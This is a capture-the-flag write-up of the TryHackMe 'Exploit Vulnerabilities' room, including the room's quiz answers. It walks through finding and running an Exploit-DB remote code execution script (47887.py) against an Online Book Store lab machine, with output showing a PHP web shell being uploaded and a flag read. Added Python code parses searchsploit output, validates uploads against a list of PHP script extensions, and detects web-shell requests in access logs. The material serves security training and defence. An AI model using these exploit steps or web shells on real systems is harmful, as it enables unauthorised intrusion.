Try Hack Me Exploit Vulnerabilities
@ Animesh Roy | Sunday, Sep 26, 2021 | 7 minutes read | Update at Sunday, Sep 26, 2021

Overview

Exploit Vulnerabilities [Subscription Required]

Task 01: Introduction

In this room, we will go over some ways of identifying vulnerabilities and combine them with our research skills to learn how those vulnerabilities can be abused.


Task 02: Automated Vs. Manual Vulnerability Research

There is a myriad of tools and services available in cybersecurity for vulnerability scanning. Ranging from commercial (with a hefty price tag) to open-source and free, vulnerability scanners are a convenient means of quickly canvassing an application for flaws.

For example, the vulnerability scanner Nessus has both a free (community) edition and a commercial one. The commercial version, which costs thousands of pounds for a year’s licence, is likely to be used in organisations that provide penetration testing services or audits.

I have detailed some of the advantages and disadvantages of using a vulnerability scanner in a table (image not reproduced here).

Frameworks such as Metasploit also include vulnerability scanners among their modules; this is something you will learn about in a later module in this pathway.

Manual scanning for vulnerabilities is often the weapon of choice of a penetration tester when testing individual applications or programs. In practice, manual scanning searches for the same vulnerabilities and uses similar techniques as automated scanning.

Ultimately, both techniques involve testing an application or program for vulnerabilities. The categories of vulnerability involved are listed in an image (not reproduced here).

If you are keen to learn more about these vulnerabilities, the OWASP framework will be a useful read.


Flag-02

Question | Answer
You are working close to a deadline for your penetration test and need to scan a web application quickly. Would you use an automated scanner? (Yay/Nay) | yay
You are testing a web application and find that you are able to input and retrieve data in a database. What vulnerability is this? | injection
You manage to impersonate another user. What vulnerability is this? | Broken Access Control


Task 03: Finding Manual Exploits

Rapid7

Much like other services such as Exploit DB and NVD, Rapid7 is a vulnerability research database. The difference is that this database also acts as an exploit database. Using this service, you can filter by type of vulnerability (i.e. application or operating system).

Additionally, the database contains instructions for exploiting applications using the popular Metasploit tool (you will learn about this tool in depth later in the learning path). For example, this entry on Rapid7 is for “Wordpress Plugin SP Project & Document”, where we can see instructions on how to use an exploit module to abuse this vulnerability.

GitHub

GitHub is a popular web service designed for software developers. The site is used to host and share the source code of applications to allow collaborative work. Security researchers have taken to the platform for the same reasons: they store and share PoCs (Proofs of Concept) on GitHub, which turns it into an exploit database in this context.

GitHub is extremely useful for finding rare or fresh exploits because anyone can create an account and upload – there is no formal verification process like there is with other exploit databases. The downside is that PoCs may not work, and little to no support will be provided.

GitHub uses a tagging and keyword system, so we can search it by keywords such as “PoC”, “vulnerability” and many more. At the time of writing, there are 9,682 repositories with the keyword “cve”. We can also filter the results by programming language.

Searchsploit

Searchsploit is a tool available on popular pentesting distributions such as Kali Linux, as well as on the TryHackMe AttackBox. It is an offline copy of Exploit-DB, keeping copies of the exploits on your own system.

You can search searchsploit by application name and/or vulnerability type. For example, in the snippet below (not reproduced here), we search searchsploit for exploits relating to WordPress that we can use – no downloading necessary!
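Searchsploit prints its results as a title/path table (the same layout appears in the Task 05 output later in this write-up), and the path alone tells you the platform directory (php, asp, linux) and category (webapps, remote, local) of each entry. The Python below is an added example, not part of the original post and not searchsploit's own code: it parses a constructed sample in that layout and filters the rows by vulnerability keyword, platform and whether the entry is a ready-to-run script rather than a text advisory. The function names and the sample rows are assumptions.

```python
"""Parse searchsploit's table output and filter it by vulnerability type.

Added example (not part of the original write-up or of searchsploit).
SAMPLE_OUTPUT is constructed to mirror searchsploit's table layout.
"""
import re

# Constructed sample in the layout searchsploit prints (columns: Title | Path).
SAMPLE_OUTPUT = """\
--------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                               |  Path
--------------------------------------------------------------------------------------------- ---------------------------------
GotoCode Online Bookstore - Multiple Vulnerabilities                                         | asp/webapps/17921.txt
Online Book Store 1.0 - 'bookisbn' SQL Injection                                             | php/webapps/47922.txt
Online Book Store 1.0 - Arbitrary File Upload                                                | php/webapps/47928.txt
Online Book Store 1.0 - Unauthenticated Remote Code Execution                                | php/webapps/47887.py
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
"""

# Exploit-DB paths are <platform>/<category>/<file>.
PATH_RE = re.compile(r"^(?P<platform>[^/]+)/(?P<category>[^/]+)/(?P<file>[^/]+)$")
SCRIPT_SUFFIXES = (".py", ".rb", ".sh", ".c", ".pl")


def parse_searchsploit(text):
    """Return one dict per exploit row: title, path, platform, category, is_script."""
    entries = []
    for line in text.splitlines():
        # Skip separator rules and lines that are not table rows.
        if "|" not in line or line.startswith("-"):
            continue
        title, _, path = line.rpartition("|")
        title, path = title.strip(), path.strip()
        if title == "Exploit Title" or not path:  # header row
            continue
        m = PATH_RE.match(path)
        if not m:
            continue
        entries.append({
            "title": title,
            "path": path,
            "platform": m.group("platform"),    # e.g. php, asp, linux
            "category": m.group("category"),    # e.g. webapps, remote, local
            # .txt entries are advisories/write-ups; scripts are ready to run.
            "is_script": path.endswith(SCRIPT_SUFFIXES),
        })
    return entries


def filter_exploits(entries, keyword=None, platform=None, scripts_only=False):
    """Filter rows by case-insensitive title keyword, platform directory and file type."""
    out = []
    for e in entries:
        if keyword and keyword.lower() not in e["title"].lower():
            continue
        if platform and e["platform"] != platform:
            continue
        if scripts_only and not e["is_script"]:
            continue
        out.append(e)
    return out


if __name__ == "__main__":
    rows = parse_searchsploit(SAMPLE_OUTPUT)
    for e in filter_exploits(rows, keyword="remote code execution", platform="php"):
        print(e["path"], "-", e["title"])
```

To run it against real output, pipe `searchsploit <terms>` into the parser (searchsploit can also emit JSON with its `-j` flag, which avoids parsing the table at all); the point of the `is_script` field is that a `.txt` hit is an advisory you still have to read and weaponise yourself, whereas a `.py` or `.rb` hit is something you can read through and configure.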

Flag-03

Question | Answer
What website would you use as a security researcher if you wanted to upload a Proof of Concept? | GitHub
You are performing a penetration test at a site with no internet connection. What tool could you use to find exploits to use? | searchsploit

Task 04: Example of Manual Exploitation

We can use the information gathered from task 2 in this room to exploit the vulnerable service. Ultimately, one of the most effective classes of vulnerability to exploit is one that lets us execute commands on the target that is running the vulnerable application or service.

For example, being able to execute commands on the host running the vulnerable application or service lets us read files or run commands that the application or service alone would never allow. We can also use this to gain what is known as a foothold: access to the vulnerable machine’s console, from which we can go on to exploit other applications or machines on the network.

We are going to use an exploit that performs remote code execution against the application from task 2, letting us run commands on the vulnerable machine.

Before we start, it is important to note that exploits rarely work out of the box. They often need some configuration before they will work for our environment or target. How much configuration is needed varies by exploit, and you will often find several exploits for the same vulnerability in an application. It is up to you to work out which exploit is the most appropriate or useful to you.

For example, in the snippets below (screenshots not reproduced here), a few options have been changed to reflect the IP address of the machine that we are attacking from.

Once we have configured the exploit correctly, we read further into it to understand how to use it. In the snippet (screenshot not reproduced here), we can see that we need to provide two arguments when running the exploit.

With this information in mind, we are now ready to use this exploit on the vulnerable machine. We are going to do the following:

  1. Use the exploit to upload a malicious file, containing whatever command we wish to execute, to the vulnerable application; the web server will then run this file, executing our command.
  2. The file will first contain a basic command that we use to verify that the exploit has worked.
  3. Then we will read the contents of a file located on the vulnerable machine.

(screenshots not reproduced here)
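The attack above works only because the application accepts a file with a script extension into a directory the web server will execute scripts from. The following Python is an added example (not code from the write-up, from the exploit or from the vulnerable application) of the checks a hardened upload handler would perform before storing an image: strip any client-supplied path, allow only the last extension and only from an allowlist, reject script extensions anywhere in the name, verify the file’s magic bytes against the declared type, refuse image files that also carry a PHP open tag, and store the file under a server-generated name. All function and constant names are assumptions.

```python
"""Hardened upload check for an image directory.

Added example: not code from the write-up, the exploit or the vulnerable
application. All names are assumptions.
"""
import os
import secrets

# Allowed final extensions and the magic bytes each must start with.
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Extensions that some PHP-enabled servers execute when they appear anywhere
# in a multi-extension name such as "shell.php.png".
SCRIPT_EXTS = {"php", "php3", "php5", "php7", "phtml", "phar"}
PHP_OPEN_TAGS = (b"<?php", b"<?=", b'<script language="php"')


def rejection_reason(original_name, data):
    """Return None if the upload is an acceptable image, else a short reason."""
    # 1. Drop any client-supplied directory part ("../", absolute paths).
    base = os.path.basename(original_name.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return "no file extension"
    ext = parts[-1]
    # 2. Only the final extension counts, and it must be on the allowlist.
    if ext not in IMAGE_MAGIC:
        return f"extension {ext!r} not allowed"
    # 3. A script extension in an earlier position is still dangerous.
    if SCRIPT_EXTS & set(parts[1:-1]):
        return "script extension inside file name"
    # 4. The bytes must match the type the extension claims.
    if not data.startswith(IMAGE_MAGIC[ext]):
        return "content does not match declared image type"
    # 5. Refuse image/PHP polyglots. Re-encoding the image server-side is the
    #    stronger fix; this check only catches the obvious case.
    if any(tag in data.lower() for tag in PHP_OPEN_TAGS):
        return "PHP open tag inside image data"
    return None


def safe_upload_name(original_name, data):
    """Validate the upload and return a server-generated name to store it under.

    The client's name is never reused, so even a valid image cannot be placed
    under a name (or path) the uploader chose.
    """
    reason = rejection_reason(original_name, data)
    if reason is not None:
        raise ValueError(f"upload rejected: {reason}")
    ext = os.path.basename(original_name.replace("\\", "/")).rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32          # constructed PNG header
    print(safe_upload_name("holiday.png", png))
    print(rejection_reason("PQytuI1suX.php", b"<?php /* constructed */ ?>"))
```

The name-based checks alone are not enough: the web server should also be configured so that nothing under the upload directory is ever handed to the PHP interpreter, which closes the hole even if a validation bug lets a script through.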

Flag-04

Question | Answer
What type of vulnerability was used in this attack? | RCE

Task 05: Practical: Manual Exploitation

Deploy the machine attached to this task and wait a minimum of five minutes for it to be fully set up. After five minutes, visit the web server running on the machine by navigating to http://MACHINE_IP in the browser of the device connected to the THM network (your own or the AttackBox).

5.1

  • Open the IP in a web browser and look at the footer area (screenshot not reproduced here).

5.2

  • Search for a vulnerability:

    searchsploit online book store
    
    --------------------------------------------------------------------------------------------- ---------------------------------
    Exploit Title                                                                               |  Path
    --------------------------------------------------------------------------------------------- ---------------------------------
    GotoCode Online Bookstore - Multiple Vulnerabilities                                         | asp/webapps/17921.txt
    Online Book Store 1.0 - 'bookisbn' SQL Injection                                             | php/webapps/47922.txt
    Online Book Store 1.0 - Arbitrary File Upload                                                | php/webapps/47928.txt
    Online Book Store 1.0 - Unauthenticated Remote Code Execution                                | php/webapps/47887.py
    --------------------------------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
    
  • We have an Unauthenticated Remote Code Execution exploit; let’s use it against the application.

  • Copy the exploit: searchsploit -m php/webapps/47887.py

  • Run the exploit:

    python 47887.py http://10.10.18.54
    > Attempting to upload PHP web shell...
    > Verifying shell upload...
    > Web shell uploaded to http://10.10.18.54/bootstrap/img/PQytuI1suX.php
    > Example command usage: http://10.10.18.54/bootstrap/img/PQytuI1suX.php?cmd=whoami
    > Do you wish to launch a shell here? (y/n): y
    RCE $ cat flag.txt
    flag{here}
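
From a defender’s side, the exploit run above leaves a recognisable trail in the web server’s access log: a new .php file served from an image directory, followed by GET requests to it carrying a cmd= parameter. The Python below is an added example, not part of the original write-up, that applies those two detections to constructed Apache combined-format log lines modelled on the Task 04 procedure and the Task 05 output; the upload endpoint name, timestamps, client addresses and directory list are assumptions.

```python
"""Detect web-shell upload and use in Apache combined-format access logs.

Added example, not part of the original write-up. The log lines, the upload
endpoint name, timestamps and client addresses are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Server-side script extensions that should never be served from these
# static/upload directories (directory list is an assumption for this example).
SCRIPT_EXTS = (".php", ".phtml", ".phar")
STATIC_DIRS = ("/bootstrap/img/", "/images/", "/uploads/")
# Query-parameter names commonly used by simple web shells to pass a command.
SHELL_PARAMS = {"cmd", "exec", "command"}

# Constructed sample: normal browsing from one client, then an upload and
# web-shell use from another. "/admin/upload.php" is an assumed endpoint.
SAMPLE_LOG = """\
10.10.18.54 - - [26/Sep/2021:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5123
10.10.18.54 - - [26/Sep/2021:10:01:09 +0000] "GET /bootstrap/img/logo.png HTTP/1.1" 200 9811
10.9.2.17 - - [26/Sep/2021:10:02:15 +0000] "POST /admin/upload.php HTTP/1.1" 200 311
10.9.2.17 - - [26/Sep/2021:10:02:16 +0000] "GET /bootstrap/img/PQytuI1suX.php HTTP/1.1" 200 0
10.9.2.17 - - [26/Sep/2021:10:02:20 +0000] "GET /bootstrap/img/PQytuI1suX.php?cmd=whoami HTTP/1.1" 200 18
10.9.2.17 - - [26/Sep/2021:10:02:31 +0000] "GET /bootstrap/img/PQytuI1suX.php?cmd=cat%20flag.txt HTTP/1.1" 200 22
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_webshell_activity(log_text):
    """Return alerts for (A) scripts served from static dirs and (B) shell-style params."""
    alerts = []
    seen_scripts = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        path = url.path.lower()
        # Rule A: a script file under a directory meant for static content.
        # Reported once per path, with the first requester, so the moment the
        # file appeared stands out even if it is later hit hundreds of times.
        if path.endswith(SCRIPT_EXTS) and path.startswith(STATIC_DIRS):
            if path not in seen_scripts:
                seen_scripts.add(path)
                alerts.append({"rule": "script-in-static-dir", "ip": rec["ip"],
                               "time": rec["time"], "path": url.path})
        # Rule B: a shell-style command parameter on any request; the decoded
        # value shows the analyst what was run.
        params = parse_qs(url.query)
        hits = SHELL_PARAMS & set(params)
        if hits:
            name = sorted(hits)[0]
            alerts.append({"rule": "shell-parameter", "ip": rec["ip"],
                           "time": rec["time"], "path": url.path,
                           "param": name, "value": params[name][0]})
    return alerts


if __name__ == "__main__":
    for a in find_webshell_activity(SAMPLE_LOG):
        print(a["time"], a["ip"], a["rule"], a["path"], a.get("value", ""))
```

On a real log, Rule A is the higher-signal one: a legitimate application has no reason to serve .php from an image folder, so each first-seen hit is worth an investigation, and the preceding POST from the same source address points at the upload endpoint that needs fixing. Rule B will need tuning against the application’s own parameter names before it is used for alerting.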
    

Flag-05

Question | Answer
Find out the version of the application that is running. What are the name and version number of the application? | see 5.1
Now use the resources and skills from this module to find an exploit that will allow you to gain remote access to the vulnerable machine. | n/a
Use this exploit against the vulnerable machine. What is the value of the flag located in a web directory? | see 5.2
